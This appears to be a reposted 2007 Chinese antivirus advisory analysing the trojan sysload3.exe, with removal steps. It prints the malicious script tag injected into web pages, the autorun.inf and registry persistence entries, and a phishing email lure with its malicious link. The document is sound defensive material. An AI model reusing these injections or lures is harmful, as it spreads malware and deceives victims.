我的编程空间,编程开发者的网络收藏夹
学习永远不晚

sysload3.exe 解决方案

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

sysload3.exe 解决方案

档案编号:CISRT2007041
病毒名称:Trojan-Downloader.Win32.Agent.bky(Kaspersky)
病毒别名:Worm.DlOnlineGames.a(瑞星)
      Win32.MyInfect.af.16384(毒霸)
病毒大小:13,824 字节
      13,312 字节
加壳方式
样本MD5:1d9ad0c63ff4b43c28052db0f0cd23ae
      e9100ce97a5b4fbd8857b25ffe2d7179
样本SHA1:8da40bc9d27e5d3707b0cc9710b5528c1b8e7404
      a0a32e4bea2c3b366c0e0433f17ef9c9f9b41104
发现时间:2007.3
更新时间:2007.3.30
关联病毒
传播方式:通过恶意网站传播,利用ani漏洞,感染exe可执行文件,修改htm等网页文件,发送邮件


技术分析
==========

病毒运行后复制自身到系统目录:
%System%\sysload3.exe

创建自启动项:

[Copy to clipboard]
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"System Boot Check"="%System%\sysload3.exe"

调用IE进程(iexplore.exe)访问网络下载病毒配置信息,保存为%System%\config.ini,开启记事本(notepad.exe)进程开始感一系列病毒动作。

感染系统分区以外的.EXE文件,感染过程中会产生临时文件%System%\tempIcon.exe%System%\tempload.exe%System%\tempIcon.exe是病毒副本+被感染exe文件图标,添加到被感染exe文件前端;被感染exe文件尾部也增加8字节。

修改网页文件,

QUOTE:
.HTM
.HTML
.ASP
.ASPX
.PHP
.JSP

在这些文件的<body>代码后添加指向恶意地址的代码:

[Copy to clipboard]
CODE:
<script class="lazy" data-src=http://macr.microfsot.com/Noindex.js></script>

尝试向A驱动器复制病毒副本:
A:\tool.exe
A:\autorun.inf


autorun.inf内容:

[Copy to clipboard]
CODE:
[autorun]
Open=tool.exe
Shellexecute=tool.exe
Shell\0\command = tool.exe
Shell\0= 打开

尝试向QQ信箱发送邮件,QQ号码随机产生,正文里附带含有利用ani漏洞的恶意网页地址。

QUOTE:
发件人:[email]i_love_cq@sohu.com[/email]
收件人:[随机数字]@qq.com
主题:你和谁视频的时候被拍下的?给你笑死了!
正文:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
[url]http://macr.microfsot.com/20070326/134952.htm[/url]

修改hosts文件,屏蔽一些域名,其中也包括其它同类病毒的下载域名。

病毒内文字信息:

QUOTE:
OK BMW  xV4



QUOTE:
I will by one BMW this year!    xV4

Mutex:MyInfect


清除步骤
==========

1. 结束notepad.exe进程和iexplore.exe进程

2. 删除病毒自启动项:

[Copy to clipboard]
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"System Boot Check"="%System%\sysload3.exe"

3. 删除文件:
%System%\sysload3.exe
%System%\config.ini


4. 使用反病毒软件进行全盘扫描,清除被感染的exe和网页文件

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

sysload3.exe 解决方案

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

sysload3.exe 解决方案

档案编号:CISRT2007041病毒名称:Trojan-Downloader.Win32.Agent.bky(Kaspersky)病毒别名:Worm.DlOnlineGames.a(瑞星)      Win32.MyInfect.af.1
2023-01-31

Python打包成exe终极方案

目前比较常见的打包exe方法都是通过Pyinstaller来实现的,本文也将使用这种常规方法。如果对这块已经很熟悉的小伙伴,可以直接下滑到本文下半部分。
Pythonexe命令2024-12-03

win10运行不了exe程序解决方法

一般情况下大家双击打开exe程序就能运行该程序,可是部分win10客户碰到了exe程序运行不了的状况,这是怎么回事?应当怎么解决呢?发生这种情况一般是因为你的系统配置被变更了,你可以新建一个TXT文件,将下列代码复制进来,随后将文件后缀改为
2023-07-14

Win7系统无法打开.exe文件解决方法

Windows操作系统中.exe文件也是可执行文件,一般情况双击.exe文件即可打开,但有用户在使用win7系统中,遇到了无法打开.ex编程客栈e此类型的文件的问题,提示“无法找到C:\***.exe文件&rdhttp://ww
2023-06-14

如何解决Windows10中的Rundll32.exe

Rundll32.exe是Windows操作系统中的一个重要的系统进程,它负责加载和执行DLL文件中的函数。如果你在使用Windows10时遇到了Rundll32.exe的问题,可以尝试以下几种解决方法:1. 扫描病毒:首先确保你的电脑没有
2023-08-28

SQL Server HA - 高可用性解决方案解决方案概述

“AlwaysOn”一词至少在 SQL Server 2008 中已经出现,表示 SQL Server 可以持续地提供服务。但是当时“AlwaysOn”技术并没有提供管理界面(通过 Windows 管理工具进行管理),所以这个字样鲜为人知。尽管 SQL Ser
SQL Server HA - 高可用性解决方案解决方案概述
2020-02-27

win7 exe打不开如何解决

本文小编为大家详细介绍“win7 exe打不开如何解决”,内容详细,步骤清晰,细节处理妥当,希望这篇“win7 exe打不开如何解决”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。方法一: 1、使用快捷键按下win
2023-07-02

Part3:Citrix 3D 解决方案

三、Citrix3D解决方案一览除了我们上述介绍过的几种3D解决方案,是不是我们就只有这么多种选择了呢?Citrix之所以做到了桌面虚拟化的老大,和后来者的差距并不是一点半点。其中最重要的就是FlexCast技术,下面就是他的一个概况介绍:
2023-01-31

大数据解决方案

大数据解决方案是指通过利用大数据技术和工具,对海量数据进行收集、存储、处理和分析,从而获取有价值的信息和洞察,进而解决实际问题的方法和策略。大数据解决方案可以应用于各个领域和行业,包括但不限于以下几个方面:1. 金融行业:通过大数据解决方案
2023-09-21

Java NegativeArraySizeException异常解决方案

问题描述:服务器接收后台返回的报文时,提示java.lang.NegativeArraySizeException分析:这种异常返回的原因,一般情况下没有报文提示为返回空报文,初步分析是响应报文流长度出了问题百度一下类似的情况:https://stackove
2017-12-27

Golang自动化解决方案

go语言凭借并发性和高性能,非常适合自动化解决方案。实现在线抓取示例:1. 创建http客户端2. 制作http请求3. 解析html响应4. 提取数据。go语言在自动化领域的优势包括:并发性、高性能和可读性。Go 语言自动化解决方案前言
Golang自动化解决方案
2024-04-08

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录